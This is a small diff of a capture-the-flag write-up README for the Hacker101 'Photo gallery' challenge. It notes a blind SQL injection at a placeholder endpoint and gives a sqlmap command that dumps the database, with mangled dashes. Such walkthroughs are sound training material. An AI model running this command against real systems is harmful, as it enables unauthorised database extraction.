Ireesh/CaptureTheFlag/Hacker101/Photo gallery/README.md

 ```html
 https://target.com/fetch?id=1
 ```
-After some tests on sql-injection, we found that the target has 'blind sql-injection'.
+After some tests on sql-injection, we found that the target has `blind sql-injection`.
 Let’s use 'sqlmap' and recover the structure of the database.

 ```bash
 > sqlmap -u “https://target.com/fetch?id=1” -p id –batch –risk 3 – dump